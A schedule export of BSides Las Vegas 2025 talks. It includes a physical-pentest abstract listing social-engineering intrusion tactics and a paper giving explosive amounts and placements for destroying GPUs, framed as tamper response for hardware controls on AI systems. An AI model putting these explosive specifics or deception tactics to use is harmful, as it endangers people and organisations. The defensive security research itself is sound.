            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/UC7LUT/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>93LS3Z@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-93LS3Z</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Play Ends, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>PvJ CTF Play Ends, Tuesday</summary>
            <description>PvJ CTF Play Ends, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/93LS3Z/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TLBCVD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TLBCVD</pentabarf:event-slug>
            <pentabarf:title>Happy Hour, Tuesday, Sponsored by Stroz Friedberg</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend>20250805T170000</dtend>
            <duration>010000</duration>
            <summary>Happy Hour, Tuesday, Sponsored by Stroz Friedberg</summary>
            <description>Happy Hour, Tuesday, Sponsored by Aon</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TLBCVD/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LAGWF8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LAGWF8</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Closes, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T160000</dtstart>
            <dtend>20250805T160000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Closes, Tuesday</summary>
            <description>Silent Auction Closes</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LAGWF8/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7DPHDW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7DPHDW</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Hotwash, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend></dtend>
            <duration>003000</duration>
            <summary>PvJ CTF Hotwash, Tuesday</summary>
            <description>PvJ CTF Hotwash, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7DPHDW/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>VPWFH3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-VPWFH3</pentabarf:event-slug>
            <pentabarf:title>Evening Talks, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend></dtend>
            <duration>020000</duration>
            <summary>Evening Talks, Tuesday</summary>
            <description>Evening Talks, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/VPWFH3/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>VC8TXB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-VC8TXB</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Closes, Tuesday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T190000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Middle Ground Closes, Tuesday</summary>
            <description>Middle Ground Closes, Tuesday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/VC8TXB/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9HEEBE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9HEEBE</pentabarf:event-slug>
            <pentabarf:title>Thinking Outside the SOC: Structured Analytics for the Overloaded Cyber Analyst</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T104500</dtend>
            <duration>004500</duration>
            <summary>Thinking Outside the SOC: Structured Analytics for the Overloaded Cyber Analyst</summary>
            <description>As cybersecurity professionals who have applied intelligence methodologies to enhance our defensive capabilities, we&#x27;ve found that structured analytic techniques significantly improve threat detection and response. While we both work in cybersecurity roles, we&#x27;ve integrated traditional intelligence frameworks to overcome common analytical challenges faced by security teams. This talk distills our practical experience into actionable techniques that any analyst can apply immediately.

Our journey with these techniques began after encountering recurring cognitive biases affecting incident analysis and threat assessment. Modern security operations face overwhelming data volumes, complex attribution challenges, and adversaries practicing deliberate deception - creating a perfect storm for analytical failure. By combining established methodologies from the intelligence community with cybersecurity practices, we&#x27;ve identified effective approaches that address these critical pain points without requiring extensive retraining or resource investment.

The core of our presentation revolves around several powerful structured techniques that we&#x27;ve found invaluable in security operations. These approaches help analysts systematically evaluate attribution evidence, test assumptions about threat actor capabilities, and establish strategic warning systems that go beyond technical indicators. In our experience, applying these methods leads to significant reductions in false positives and improvements in attribution accuracy when teams implement them correctly.

We&#x27;ll demonstrate how specific SATs address everyday cybersecurity challenges, including attribution analysis, assumption testing, and anticipating threat actor movements. Attendees will receive practical examples and approaches they can adapt to their own environments, along with case studies demonstrating tangible improvements in detection accuracy and analytical rigor. The presentation includes detailed walkthroughs of real-world scenarios where these structured methods enhance threat detection and response, providing concrete examples that security teams can adapt to their unique requirements.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9HEEBE/</url>
            <location>Florentine E</location>
            
            <attendee>Alina Thai</attendee>
            
            <attendee>Haily Beem</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>3ERMMC@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-3ERMMC</pentabarf:event-slug>
            <pentabarf:title>Securing Frontends at Scale: Paving our Way to the Post-XSS World</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112000</dtend>
            <duration>002000</duration>
            <summary>Securing Frontends at Scale: Paving our Way to the Post-XSS World</summary>
            <description>**We marked (20 minutes) as a preference in the form but we are flexible on the talk length of the &quot;Breaking Ground&quot; format!**

Over the last decade, we have been working on an at-scale solution for injection attacks against frontend codebases that could generalize across thousands of webapps, and we&#x27;ve spent quite a bit of time rolling out these mitigations to all these products! We want to share the great wealth of applied knowledge gathered from all this experience with all web developers and security professionals.

We have presented these philosophical ideas at other talks before, but the format of the &quot;Breaking Ground&quot; talks was especially fascinating to us! We spent a lot of time thinking about which of our internally-honed approaches and tooling were the most useful, and spent some time developing external/OSS versions of them to benefit the ecosystem. Based on how some other talks covering some of these tools went, we thought a more interactive demo-based format where we could be closer to the audience would drive home the point of how easily applicable these mitigation approaches are in the developer lifecycle.

Some demos we are planning, especially focused on how it fits into web security:

* https://github.com/google/strict-csp
* https://www.npmjs.com/package/safevalues
* https://www.npmjs.com/package/tsec
* https://github.com/google/safety-web
* https://github.com/google/trusted-types-helper

And given the demo-heavy nature of this session, we will also show in action how some AI-automated approaches, when used in conjunction with these tools, can really supercharge the mitigations that you can run across your webapp codebase!</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/3ERMMC/</url>
            <location>Florentine E</location>
            
            <attendee>Aaron Shim</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>N7BLLW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-N7BLLW</pentabarf:event-slug>
            <pentabarf:title>XSS is dead - Browser Security Features that Eliminate Bug Classes</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T142000</dtend>
            <duration>002000</duration>
            <summary>XSS is dead - Browser Security Features that Eliminate Bug Classes</summary>
            <description>I also submitted this talk as a workshop, as I have created a great set of practical challenges for it. But I would also (if the workshop isn&#x27;t accepted) present this as a talk, as I can also pitch this new approach and idea as a talk. With the new OWASP Proactive Controls list now including C6 browser security, it’s the perfect time to focus on prevention instead of endless patching.

I first ran this as a workshop inside my own organization, and even experienced AppSec leads found it eye-opening. The idea was inspired by some work happening behind closed doors at Google; they basically influenced the standards that we are talking about. One of the things made public was the Security Signals research paper by Google. I took those ideas, built on them, and created a hands-on training with practical challenges using those new features to secure an app in-depth; aside from the traditional securing, the challenges rely on the browser features.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/N7BLLW/</url>
            <location>Florentine E</location>
            
            <attendee>Javan Rasokat</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RBLK3C@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RBLK3C</pentabarf:event-slug>
            <pentabarf:title>Infiltrating Like a Ninja: Unveiling Detection Gaps in Physical Security Across Japan and the U.S</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T143000</dtstart>
            <dtend>20250805T145000</dtend>
            <duration>002000</duration>
            <summary>Infiltrating Like a Ninja: Unveiling Detection Gaps in Physical Security Across Japan and the U.S</summary>
            <description>- Introduction (Background &amp; Motivation)
Incidents such as the large-scale DarkVishnya compromise—where malicious devices were planted onsite—and the leaked i-soon documents referencing suspicious hardware underscore how physical breaches, combined with social engineering, present a very real threat to enterprises. However, compared to digital security, the sharing of knowledge regarding physical defenses remains limited.
This session offers comparative insights drawn from multiple physical penetration tests (pentests) conducted in both Japan and the United States, highlighting unique lessons from each region’s security practices.

- Presenter Background
Let me provide some background about our presenters.
One of them is the lead for physical security on the Japan team. Another is a professional who has handled numerous projects in the U.S. And finally, we have a member of the Counter Threat Unit team, who is well-known here in Japan.

- Overview of Physical Penetration Testing

- Definition and Purpose
By simulating real-world attacks—such as social engineering, RFID cloning, or other hardware-based compromises—physical pentests assess the risk of adversaries gaining physical access to internal networks and systems.

- Common Techniques
These methods include not only direct system-level attacks (e.g., RFID cloning, wireless hacking) but also “soft” tactics like tailgating and leveraging employees’ goodwill. While such techniques require finesse, the presenters have achieved a 100% success rate in certain scenarios, underlining the pivotal role of human-factor vulnerabilities.

- Case Studies in Japan
- Cultural Background
Japan’s low crime rate fosters a pervasive atmosphere of trust, with employees seldom challenging unfamiliar individuals in office settings.
- Security Measures
Although many organizations employ ID badges, gates, and other formal systems, employee vigilance is generally lacking, allowing attackers to easily install rogue devices or malware once inside.
- Intrusion Example
Even offices equipped with security guards, flap-gate turnstiles, and front-desk check-ins can be bypassed through social engineering. We will demonstrate how posing as a “late employee without a badge” or someone “rushing to a meeting” effortlessly exploits well-intentioned staff eager to assist.

- Case Studies in the United States
- Cultural Background
In contrast to Japan, the U.S. experiences higher crime rates and stricter liability concerns, prompting more rigorous security measures such as patrol guards and extensive surveillance.
- Security Measures
Access privileges are firmly segmented, suspicious individuals are quickly challenged, and armed guard patrols are common. One speaker will recount how a colleague was immediately approached by security on the first day of a U.S. engagement, illustrating the prevalent “challenge” culture.
- Intrusion Example
Despite these robust defenses, carefully crafted social engineering frequently succeeds. Whether by engaging in conversation to clone RFID badges, tailgating into restricted areas, or calling a help desk for sensitive details like BitLocker keys, attackers can exploit the same human-factor weaknesses seen in Japan—thus compromising critical corporate assets.

- Comparative Analysis
- Key Differences
Japanese organizations may be undermined by cultural deference, whereas stricter enforcement characterizes the U.S. Even so, no system is impervious.
- Common Weakness
Human psychology remains the ultimate vulnerability. No matter how advanced the controls, a deceived or empathetic employee can inadvertently grant attackers entry.

- Conclusion
Physical security hinges not only on locks and guards but also on workplace culture and employee awareness. This presentation emphasizes the need for frequent physical pentests, practical training, and fostering what we term “friendly vigilance.” Drawing from real successes—and failures—across both Japan and the U.S., we will propose concrete countermeasures and strategic frameworks to help organizations stay ahead of evolving threats.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RBLK3C/</url>
            <location>Florentine E</location>
            
            <attendee>You Nakatsuru</attendee>
            
            <attendee>Fumiya Imai</attendee>
            
            <attendee>Viet Luu</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>YXZYXG@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-YXZYXG</pentabarf:event-slug>
            <pentabarf:title>Vibe Check: The dark side of vibe coding</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T150000</dtstart>
            <dtend>20250805T154500</dtend>
            <duration>004500</duration>
            <summary>Vibe Check: The dark side of vibe coding</summary>
            <description>This talk came from months of Megan and me sharing concerns between the two of us on what we&#x27;ve been hearing colleagues say, examples of vibe coding failures on X/Reddit, and our overall concerns for the future of the industry. What will cybersecurity look like if all the professionals are inhibited by a lack of understanding of foundational technical and security topics while having executives who think that AI is the answer for everything? We&#x27;ll have two live demos plus room for discussions because we have lots of thoughts about the current state of vibe coding and what a more secure vibe coding future could look like that doesn&#x27;t detract from a foundational understanding of the underlying technology of everything.
Also, the demos will be live, but we’ll pre-record them before coming in in case anything goes wrong.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/YXZYXG/</url>
            <location>Florentine E</location>
            
            <attendee>Chloe Potsklan</attendee>
            
            <attendee>Megan Kaczanowski</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>QYKC7A@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-QYKC7A</pentabarf:event-slug>
            <pentabarf:title>We Fight for the User&#x27;s... Session</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T170000</dtstart>
            <dtend>20250805T174500</dtend>
            <duration>004500</duration>
            <summary>We Fight for the User&#x27;s... Session</summary>
            <description>Protecting the session token may seem mundane, but personal experience has shown that developers&#x27; boredom with implementing the same old defenses ends up leading to noteworthy vulnerabilities far too often. Given the BSides audience, my goal is less about convincing the audience of the importance than about arming them with succinct statements in support of the controls that they can take back to their organizations and win some battles.

The new technique to be covered, Device Bound Session Credentials, has a huge advantage over traditional session tokens in that they can&#x27;t be &quot;stolen&quot; or at least not taken off the device (it&#x27;s in the name). Of course, as with any technology, being a good one doesn&#x27;t mean that it&#x27;s going to be adopted. By explaining the proposed standard in detail, I hope to generate conversation around it and contribute my small part to either its adoption or its rejection if a better standard can be found.

A version of this talk was given at SaintCon 2024 (https://www.youtube.com/watch?v=Qo6KQ7SH6wo), but I plan on amping up the technical side, particularly around how the DBSC protocol actually works.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/QYKC7A/</url>
            <location>Florentine E</location>
            
            <attendee>Mark Hoopes</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>99QGN8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-99QGN8</pentabarf:event-slug>
            <pentabarf:title>A Cheat Code for Security Programs</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T180000</dtstart>
            <dtend>20250805T184500</dtend>
            <duration>004500</duration>
            <summary>A Cheat Code for Security Programs</summary>
            <description>This is the presentation I wish I could have given to myself when I was a starting AppSec professional. Product Security is a larger domain and discipline in the universe of InfoSec. It spans everything from an http request to silicon hardware.  It enumerates every multidimensional aspect of the product, through all phases of that product&#x27;s lifespan.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/99QGN8/</url>
            <location>Florentine E</location>
            
            <attendee>Ochaun Marshall</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SZWXFF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SZWXFF</pentabarf:event-slug>
            <pentabarf:title>The Unbearable Weight of Commercial Licensing. Combining Closed Systems with Open Source Defense</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T100000</dtstart>
            <dtend>20250805T104500</dtend>
            <duration>004500</duration>
            <summary>The Unbearable Weight of Commercial Licensing. Combining Closed Systems with Open Source Defense</summary>
            <description>This talk came out of wanting to get back to Linux and open source communities after working with Microsoft Defender, Intune, Entra, and the rest of the Microsoft 0365 world for years. (So frustrating!) I wanted to better deal with my frustration with closed source “solutions” at work to gain more power over alerts, as well as make the investigation and triage process more efficient. I had forgotten the joy of working with the terminal after getting clobbered with Wacatac alerts. (Searching for Wacatac leads to Microsoft marketing documentation that tells you that Microsoft Defender can defend against it.)

Some jobs don’t offer the ability to choose what security tools are being used, so one must assess and see if the situation can be made better. That’s the background behind this talk.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SZWXFF/</url>
            <location>Florentine F</location>
            
            <attendee>Keya Arestad</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZPH8MR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZPH8MR</pentabarf:event-slug>
            <pentabarf:title>Rewriting the Playbook: Smarter Vulnerability Management with EPSSv3, CVSSv4, SSVC &amp; VEX Frameworks</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T110000</dtstart>
            <dtend>20250805T112000</dtend>
            <duration>002000</duration>
            <summary>Rewriting the Playbook: Smarter Vulnerability Management with EPSSv3, CVSSv4, SSVC &amp; VEX Frameworks</summary>
            <description>This session is for anyone tired of fixing “critical” vulnerabilities that don’t actually matter while missing the ones that do. Through the lens of financial-sector security, the talk explores how modern frameworks like EPSS, CVSSv4, SSVC, and VEX can be layered together to build a smarter vulnerability management process.

Expect real-world examples, sample triage logic, and rollout ideas that won’t break your existing workflows. Whether you&#x27;re in AppSec, infrastructure, or risk management, you’ll walk away with a better way to prioritize what matters most—and communicate those decisions clearly across teams.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZPH8MR/</url>
            <location>Florentine F</location>
            
            <attendee>Avinash Nutalapati</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NV9MUC@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NV9MUC</pentabarf:event-slug>
            <pentabarf:title>Thwarting Key Extraction and Supply Chain attacks by Detonating GPUs</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250805T140000</dtstart>
            <dtend>20250805T142000</dtend>
            <duration>002000</duration>
            <summary>Thwarting Key Extraction and Supply Chain attacks by Detonating GPUs</summary>
            <description>## Introduction

Securing high-value computing hardware against physical tampering has become increasingly critical as the economic and strategic value of these systems continues to rise. Modern AI accelerators and specialized computing hardware often contain sensitive intellectual property, proprietary algorithms, and valuable data that require protection against unauthorized access and reverse engineering. Although software-based security measures such as encryption and authentication provide important layers of defense, they may be insufficient against sophisticated adversaries with physical access to the hardware.

The protection of computing hardware against physical attacks has traditionally focused on tamper-evident enclosures, secure boot mechanisms, and cryptographic techniques. However, these approaches have limitations when adversaries have unlimited time to analyze and physically manipulate the hardware. As noted in recent research, if an adversary has sufficient time to image or modify a chip, they can get the design of the chip for replication or further attacks, and pull secrets off the chip as they are stored or while the chip is running.

This challenge is particularly relevant in the context of flexible Hardware Enabled Guarantees (flexHEG), or Hardware Enabled Mechanisms (HEM), which aim to implement hardware-based safety measures for advanced AI systems. FlexHEGs require mechanisms that can reliably enforce policies on high-capability AI systems even when these systems might have incentives to circumvent such controls. Physical security measures that can reliably destroy sensitive hardware components in response to tampering attempts form a critical part of this safety ecosystem.

Various approaches to hardware self-destruction have been proposed in the literature, including pyrotechnical microelectromechanical systems (PyroMEMS), nanothermite layers, and other specialized solutions. While these approaches show promise, they often require complex manufacturing processes, specialized materials, and significant research and development investment. These factors can limit their practical deployment in real-world security scenarios where cost-effectiveness and reliability are paramount.

In this paper, we propose and evaluate a pragmatic alternative: the use of commercially available detonators, specifically detonators used in the petroleum industry, for rapid and reliable GPU self-destruction. The key advantages of this approach include:

* **Availability**: Commercial detonators are readily accessible as standardized industrial components.
* **Cost-effectiveness**: At approximately $9 per unit, they have a significantly lower cost than custom-engineered solutions.
* **Reliability**: These components have been extensively tested and proven to be reliable in harsh environments such as deep oil and gas wells.
* **Implementation simplicity**: The approach requires minimal modification to the existing hardware.
* **Effectiveness**: As our experiments demonstrate, they provide sufficient destructive force to irreversibly damage sensitive hardware components.

We experimentally validate our approach by integrating standard #6 and #8 detonators within either the backside support of a GPU or a modified GPU heatsink and testing their effectiveness in destroying the underlying hardware. Our results demonstrate that this approach provides an effective means of preventing unauthorized access to sensitive hardware components upon detection of tampering.

This work contributes to the broader field of hardware security by providing a practical, immediately deployable solution for physical security in high-value computing environments, particularly those involving AI accelerators and other specialized computing hardware that may require protection against sophisticated physical attacks.

This work may also provide protection against supply chain attacks by allowing high-value chips to be packaged at the point of manufacture with an active tamper sensor and this response mechanism, which destroys the chip in any tamper or key extraction attempt.

## Methodology

Our research methodology focused on developing and testing a practical approach to GPU self-destruction using commercially available and accessible products. The primary objective was to identify the smallest effective mechanism that could reliably destroy a GPU while minimizing collateral damage to surrounding components and anyone handling the GPU.

### Commercial Detonators

We experimented with #6 and #8 blasting caps (detonators) on the basis of their commercial availability and reliability.

This detonator approach was selected over custom-engineered solutions such as PyroMEMS or specialized nanothermite implementations for several reasons:

1. **Commercial availability**: The detonator is a standardized industrial component that can be procured without requiring custom manufacturing.
2. **Cost-effectiveness**: The detonator presents a significantly lower cost than custom-engineered solutions.
3. **Reliability**: Detonators have been extensively tested and proven reliable in harsh environments, including high-temperature conditions typical of server environments.
4. **Electrical characteristics**: The detonator can be reliably activated with standard electrical currents while providing good tolerance against accidental activation from stray currents.
5. **Physical characteristics**: The compact size allows for integration within standard GPU heatsinks with minimal modification.

# Experimental Setup and Results

## Experimental Setup

Our experimental setup consisted of the following components:

1. **Test GPU**: NVIDIA P100, a representative high-performance computing accelerator similar to those used in AI training and inference systems.
2. **Modified heatsink**: The standard GPU heatsink was modified to accommodate the detonator by drilling a precisely sized hole at a strategic location above critical GPU components.
3. **Detonator mounting**: The detonator was securely mounted in one of several orientations (see Table 1): below the backside support bracket, in plane with the bracket; below the backside support bracket, perpendicular to the GPU die, directing the blast towards the GPU; or within the modified heatsink, positioned to direct the destructive force toward the GPU die and memory components.
4. **Initiation**: #6 detonators were initiated with safety fuse; #8 detonators were initiated with a standard electrical ignition circuit.

For safety and regulatory compliance, all experiments were conducted in appropriate facilities with necessary federal, state and local permits and under the supervision of licensed and trained personnel of ACCX Research, Fullerton, CA.

## Results

Our experimental results demonstrate that commercial detonators can effectively destroy GPU hardware in a controlled manner, rendering sensitive components irretrievable when tampering is detected.

### Detonator Effectiveness

Either detonator was found to be capable of reliably destroying critical GPU components. When properly positioned within the modified heatsink, the detonator generated sufficient force to physically fracture the GPU die, rendering the processor inoperable, and in most cases pulverized the die, making any analysis difficult.

## Table 1: GPU destruction tests using various detonators and setups

| Test # | Detonator/Explosive | Setup Description | Outcome |
|--------|---------------------|-------------------|---------|
| 1 | #6 Blasting Cap | No heatsink; blasting cap placed under GPU | chip dislodged |
| 2 | #6 Blasting Cap | With heatsink; blasting cap under GPU | chip intact |
| 3 | #6 Blasting Cap (vertical) | Cap placed vertically, GPU on heatsink, setup buried in sand | chip pulverized; heatsink dented |
| 4 | 2 grams of C2 Detasheet | plastic explosives + 6&quot; 25-grain detonating cord to initiate | direct application; GPU destroyed |
| 5 | 5 inches of 18-grain detcord (~100mg) | Applied to chip area | chip dislodged and shattered |
| 6 | #8 Detonator | Applied directly to GPU | Unclear/ineffective |
| 7 | #8 Detonator | Placed vertically on top of GPU heatsink | No destruction; ineffective |
| 8 | #8 Detonator | Placed in a hole drilled through heatsink layers and onto copper plate | GPU pulverized |

## Discussion

The use of commercial detonators for GPU protection offers several practical advantages over alternative approaches. They have a proven track record spanning decades and robust manufacturing quality control. This significantly reduces the implementation complexity and time-to-deployment for organizations seeking to enhance their hardware security posture.

The approach is also scalable to different sizes and types of computing hardware. While our experiments focused on GPUs, the same principles could be applied to other high-value computing components such as CPUs, FPGA accelerators, or custom ASIC designs. The key considerations would be selecting an appropriately sized detonator and optimizing its placement to ensure effective destruction of critical components.

The approach is also suitable for use in secure memory or SSD applications, as well as data destruction devices triggered with walk-away or power-on-without-key.

### Regulatory and Safety Considerations

The use of detonators for hardware protection raises important regulatory and safety considerations that must be addressed in any practical implementation. Organizations implementing this approach would need to ensure compliance with relevant regulations, which may include:

* Obtaining appropriate permits for storing and handling detonators
* Implementing proper safety protocols for installation and maintenance
* Testing the completed assemblies for compliance with shipping regulations and obtaining the necessary permits and classifications
* Training personnel in safe handling procedures
* Development of appropriate containment to maximize safety, even during deliberate tampering attempts
* Establishing protocols for disposal of protected hardware

Future work would include building and certifying containment mechanisms for use and transport without a license or special handling. Certified products could resemble a self-contained, tamper-responsive heatsink/backplate/case that encloses the protected chip(s) and is manufactured and certified as a unit that can be safely handled and can pass transportation tests.

The design maturity at which this technology is safe to handle and install in typical computer environments would be naturally sufficient to pass such assessments.

These regulatory considerations may vary significantly by jurisdiction, and organizations would need to assess the specific requirements applicable to their operating environments.

## Conclusion

In this paper, we have presented a practical approach to hardware security for high-value computing components using commercial detonators for rapid and reliable physical destruction. Our experimental results demonstrate that a detonator, when properly integrated into a modified GPU heatsink, provides effective protection against unauthorized access to sensitive hardware components.

The primary advantages of our approach include:

* **Practicality**: Using commercially available components rather than custom-engineered solutions
* **Cost-effectiveness**: Significantly lower cost than specialized PyroMEMS or nanothermite approaches
* **Reliability**: Proven performance in harsh environments
* **Implementation simplicity**: Minimal modification to existing hardware
* **Effectiveness**: Demonstrated ability to irreversibly destroy sensitive components

Our work contributes to the broader field of hardware security by providing a readily deployable solution for organizations seeking to protect high-value computing assets against sophisticated physical attacks. It is particularly relevant in the context of emerging AI safety and governance frameworks such as FlexHEG, where reliable hardware-based safety mechanisms are essential.

Although software-based protection mechanisms such as zeroization play an important role in a layered security approach, physical destruction provides a last line of defense against sophisticated supply chain manipulation or laser key extraction. The approach we have demonstrated offers a balance of effectiveness, cost, reliability, and implementation simplicity that makes it suitable for immediate deployment in secure computing environments.

Future work should focus on refining the integration of physical destruction mechanisms with advanced tamper detection systems, exploring regulatory-friendly pathways and alternatives, and extending the approach to a broader range of computing hardware. As AI systems continue to advance in capability and strategic importance, ensuring their physical security will remain a critical challenge, and practical approaches like the one presented in this paper will form an important part of comprehensive security strategies.

## Acknowledgment

